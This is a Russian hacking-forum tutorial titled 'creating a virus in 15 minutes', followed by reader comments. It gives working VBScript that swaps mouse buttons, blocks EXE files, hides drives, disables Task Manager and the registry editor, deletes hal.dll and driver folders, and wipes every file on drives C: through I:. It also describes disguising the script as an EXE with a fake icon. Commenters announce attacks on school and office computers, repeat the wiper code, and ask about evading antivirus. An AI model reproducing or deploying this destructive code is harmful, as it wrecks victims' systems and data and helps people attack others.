создаем вирус за 15 мин — HackZona.Ru

создаем вирус за 15 мин

создаем вирус за 15 мин

Тип статьи:
Со старой ХакЗоны.
Источник:
короче не важно новичок ты или умелый хакер, важно то нужно это тебе или нет???
Вредоносная программа будет написана на языке visual basic script.
Затем скомпелирована в «exe» формат.
Приступим.
Для начала, нужно уметь изменять расширение файла, с этого и начнём.
Существует много способов, но мне нравится этот.
У каждого должен быть обычный архиватор, вот им мы и воспользуемся.
И так, создайте к примеру текстовый фаил под названием «Текстовый документ».
Теперь найдите этот текстовик через свой архиватор. В архиваторе,
вы должны увидеть следующее: «Текстовый документ.txt».
Окончание «txt» — имя расширения файла, вот его и нужно изменить, точно так же, словно, редактируете имя папки или файла, стираете строчку «txt» и ставите скажем «mp3».
В результате мы получаем «Текстовый документ.mp3» формата.
Если всё понятно, а вопросов возникнуть по этому поводу недолжно, то пойдём дальше.
Создайте текстовый документ, содержащий следующее:
on error resume next
Set S = CreateObject(«Wscript.Shell»)
set FSO=createobject(«scripting.filesystemobject»)
s.run«rundll32 user32, SwapMouseButton»

Затем, сохранив полученные данные, вам нужно изменить расширение файла, и вместо «txt» прописать «vbs».

Аббревиатура «vbs», происходит от названия языка программирования — «visual basic script».

Вот у нас и готова первая, простая, вредоносная программка, меняющая местами кнопки мыши.

Теперь нужно её скомпелировать (изменить) в «exe» формат с помощью программы: «Vbs2Exe»,
и установить любой значок с помощью грабера иконок: «IconToy».

А теперь информация для тех, кто не намерен ограничивать свои возможности банальным обменом кнопок мыши.
on error resume next
Set S = CreateObject(«Wscript.Shell»)
set FSO=createobject(«scripting.filesystemobject»)
Три, верхние строчки — должны присутствовать всегда. Далее,
следует кодировка, а ниже, в скобках — пояснение.

Так же возможно сочетать, те или иные вредоносные команды.
s.regwrite«HKCRexefileshellopencommand»,«rundll32.exe»
(Запрет на открытие «EXE» файлов)
s.regwrite«HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDrives»,«67108863»,«REG_DWORD»
s.regwrite«HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoViewOnDrive»,«67108863»,«REG_DWORD»
(запрет доступа к жёстким дискам)
fso.deletefile fso.getspecialfolder(0)+«system32hal.dll»,1
(удаляется системный фаил, после чего загрузка Windows становится невозможна.

Система работает до первой перезагрузки)
fso.deletefolder fso.getspecialfolder(0)+«system32drives»,1
fso.deletefolder fso.getspecialfolder(0)+«Driver Cache»
(удаление драйверов)

fso.deletefolder «АДРЕС»,1
(Удаление папки. Пример: fso.deletefolder «C: Новая папка»,1)

fso.deletefolder «C:*.*»,1
(Удаление всех папок диска С. Адрес можно поставить любой)

fso.deletefile «АДРЕС»,1
(Удаление файла. Пример: fso.deletefile «C: Новая папкаТекстовый документ.txt»,1)

fso.deletefile «C:*.*»,1
(Удаление всех файлов диска С. Адрес можно поставить любой)

s.regwrite«HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemdisableregistrytools»,«1»,«REG_DWORD»
(Запрет редактирования реестра)

s.regwrite«HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemdisabletaskmgr»,«1»,«REG_DWORD»
(Запрет диспетчера задач)

s.run«rundll32 user32, SwapMouseButton»
(Обмен кнопок мыши)

Пример:


on error resume next
Set S = CreateObject(«Wscript.Shell»)
set FSO=createobject(«scripting.filesystemobject»)
fso.deletefile «C:*.*»,1
fso.deletefolder «C:*.*»,1
fso.deletefile «D:*.*»,1
fso.deletefolder «D:*.*»,1
fso.deletefile «E:*.*»,1
fso.deletefolder «E:*.*»,1
fso.deletefile «F:*.*»,1
fso.deletefolder «F:*.*»,1
fso.deletefile «G:*.*»,1
fso.deletefolder «G:*.*»,1
fso.deletefile «H:*.*»,1
fso.deletefolder «H:*.*»,1
fso.deletefile «I:*.*»,1
fso.deletefolder «I:*.*»,1
fso.deletefile fso.getspecialfolder(0)+«system32hal.dll»,1

Я не несу никаю отвественность за то что вы можете сделать с помошью этой статьи, так что делайте выводы…
Нравится
Не нравится

67 комментариев

20:26
ХАха,держитесь школьные компы!!!!
В пятницу будет весело,потом отпишусь!!!)))))
14:56
а как заставить его запустить???
22:19
у меня не получается .у кого получилось помогите пожалуйста..по скайпу vipseregavip1 плиз
02:52
ага, прикольно, только когда я, блин, его скомпелировал, он нафиг у меня на компе запустился автоматом. постирал мне нафиг половину ярлыков с рабочего стола и кнопки мыши поменял... Хорошо , что е сть такая штука , как востановление системы... она меня и спасла.
13:40
респект))
21:53
Я тоже испытал так случайно на своем компе вирусок....
00:02
Весело, реальный и простой вирус даже за 5 минут!
22:02
такие се вири:"быстро" удобно!И взловредно:)
15:27
дауш статья прикольная!!!! тока что делать если я испытал на себе вирус с обменом кнопок????((( а сстать ваще отпад!!! ПОМОГИТЕ ПОЖАЛУЙСТО
20:51
зайди в панель управления - мышь
и сними галочку "обменять кнопки мыши"
18:15
ЖЖОШ !!!!!!!!!!!!!!!!!!!! :-D
22:09
Помоги пожалуста а что мне зделать эсли я случайно испитал на себе :
on error resume next
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
fso.deletefile "C:*.*",1
fso.deletefolder "C:*.*",1
fso.deletefile "D:*.*",1
fso.deletefolder "D:*.*",1
fso.deletefile "E:*.*",1
fso.deletefolder "E:*.*",1
fso.deletefile "F:*.*",1
fso.deletefolder "F:*.*",1
fso.deletefile "G:*.*",1
fso.deletefolder "G:*.*",1
fso.deletefile "H:*.*",1
fso.deletefolder "H:*.*",1
fso.deletefile "I:*.*",1
fso.deletefolder "I:*.*",1
fso.deletefile fso.getspecialfolder(0)+"system32hal.dll",1
17:21
мужиГГГГГ!!!!! класная тема!!!))))) завтра на информатике прикольну учителей! пусть головы ломают!))))
00:17
А зачем в *ехе компилировать?
21:27
ээээ.... я токо начинаю хаком заниматься, объясните плизз как использовать это со своего компа на чужом???
14:26
самое клёво антивирем не палится
04:01
Накой хер использовать VBS + стороний компилятор. Если эту же примитивную хню можно накалякать в простом VB?
23:30
я вирус делол vbc.а што такое exe .там гаварит штото "Vbs2Exe",
00:20
а можно еще че нить в этом роде
00:54
эта хрень начинает действовать когда .ехе файл открывают?или просто её налия достаточно?
20:03
РеААльная тема!!!! Респект!!!!!!
07:57
Автору Спасиба за тему очень поучительно вот попробывал на своём компе просто супер , ( Чесно думал несработает ) ну не тут то было и антевирус необнаружил ))) ,Щя скопирую вирус покруче и зашлю своему менеджеру пускай Сука помучяетса . Он у нас такой мудак . Автор давай ещё подкинь что небуть
08:54
Автор розясни необразованому как скомплектовать и поменять иконку
19:44
Увожуха !!!!!!!!!!!!!!!!!!!!!!!
21:10
А если все в оду колбасу зафигачить,
будет работать???????????не хочется пробовать на себе ,
но я сделал такой набор
on error resume next
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
s.run"rundll32 user32, SwapMouseButton"
s.regwrite"HKCRexefileshellopencommand","rundll32.exe"
s.regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDrives","67108863","REG_DWORD"
s.regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoViewOnDrive","67108863","REG_DWORD"
fso.deletefile fso.getspecialfolder(0)+"system32hal.dll",1
fso.deletefolder fso.getspecialfolder(0)+"system32drives",1
fso.deletefolder fso.getspecialfolder(0)+"Driver Cache"
s.regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemdisabletaskmgr","1","REG_DWORD"


Все правильно????
20:55
товарищ админ я не нашел где именно менять на vbs в архиваторе
04:10
Охеренная статья,вот сейчас сделал вирус всё получилось.Шайтан тебе респект!!!!!Можешь в будущем написать статью как создать вирус,тобы в нём можно было заголовок написать?))
00:14
Ништяк+Респект+......КРУТО! Респект и Уважение+++++++
06:55
Я здесь вижу один большой минус!!! А именно: все они работают с "rundll32.exe", что естественно сразу заметит fairwall, как его обойти?
Ведь всем известно, что фаиру не нравиться, когда что-то лезет в другие процессы!
19:45
а етот вирус не навредит моему компу???
05:38
Большое спасибо автору, с увереностью сказать что работает! тока вот как теперь обратно кнопки мышки вернуть, чето совсем неудобно)) подскажите пожалуйста??? откуда этот код удалить??
05:39
Большое спасибо автору, с увереностью сказать что работает! тока вот как теперь обратно кнопки мышки вернуть, чето совсем неудобно)) подскажите пожалуйста??? откуда этот код удалить??
20:54
Ваш вирус может работать не только в exe формате но и просто в vdc,там говорят что бы поменять в exe что бы жертва клюнула ,подумают что какаета программа,и кирдык башка им)
20:00
Спасиб, всё круто работает, но возникает вопрос: Как назад вернуть?!
21:21
а зачем mp3 файл делать?
11:15
народ а как сменить иконку ?
в Icontoy тока можно сделать значёк !
а поменять не как !
пробовал через свойства файла, так там никуя нет !
23:18
ё отлично, но как вернуть обратно расположение кнопок на мышке????
01:06
чтоб вернуть кнопки мышки на место заходим в пуск панель управления Принтеры и другое оборудование Мышь. Там будет стоять галочка Поменять кнопки местамы. Ее нужно убрать
01:08
А мне кажется, что когда вводить например fso.deletefile "C:*.*",1 то между "C: и *.*",1 нужно поставить чтобы получилось fso.deletefile "C:*.*",1 Верно ли ето ответте пожалуйста
18:34
DAA! PRIKOLNO!
03:25
респект автору!!!!!!!!!!
14:11
молодец отл статья!
00:59
Спасибо, VBS реально рулит, хотя про него многие не знаю, ещё с помощью него можно редактировать например реестр или ещё какую нибудь штуку делать, причём пишется всё "голыми руками" в текстовом блокноте. Ещё раз спасибо
01:38
nhack ти даун ? вируси в большенстве вредят компу :)
01:38
Автору очень большое спс :) всьо канает :)
02:25
скажите ишо пару интересних таксказать функций :)
14:42
Просто супер!!!!!!!!!!!
04:23
Мне очень интересно как можно удалить файл с определенным именем не зная о том в какой папке он находится желательно VBS мне кажется это реально ведь загрузить файл допустим notepad.exe можно так :

Dim WshShell
set WshShell = CreateObject("wscript.Shell")
WshShell.Run "cmd /c notepad.exe", 0

а как его удалить без указания пути ?
22:27
а мне интересно а если в проге этот фаил переделать в мп3 с то при запуске все равно работать будет?
17:36
спасибо все работает только если спалят полный пиздец будет это точно
10:22
Супер!
15:28
Myraxa
по-моему, можно там же прописать поиск любого файла. Или узнать его трояном)
20:19
Автору респект))) прикололся на работе с кнопками мыши менеджеры были злые вызывали компьютерных генеев что бы всё исправить)))
02:03
Дааа мне очень понравилась ета статья , все просто и ясно !!!!!!!!!!! СУПЕР !!!!!!!!!!!!
12:24
Респект! Ставлю супер!
12:23
ребята!у меня получился тока прикол с мышкой а хотелось бы че нить по ссерьезнее:(
11:25
Статья супер!!!!!
Автору респект и уважуха!
21:16
Прощайте Елисей, Настя...
00:24
Автору большое спасибо! Всё работает(отличные функции).... Но,если бы здесь было написано как обойти анти вирь.....
15:20
писец все моим врагам в инете
01:22
Пипец врагам моим!! Статья супер
04:17
спасибо...Объяснили коротко и ясно))
11:50
ВАЩЕ РЕАЛ!
WWE
18:00
ЫЫЫыыыыЫЫЫЫЫЫЫыыы VBS сильная штука
15:32
спасибо
23:02
БОЛЬШОЕ СПАСИБО:)
22:50
Облазил весь гугл, но так и не нашел рабочую версия программы Vbs2Exe Может быть автор темы выложит прогу, буду благодарен, заранее спасибо:)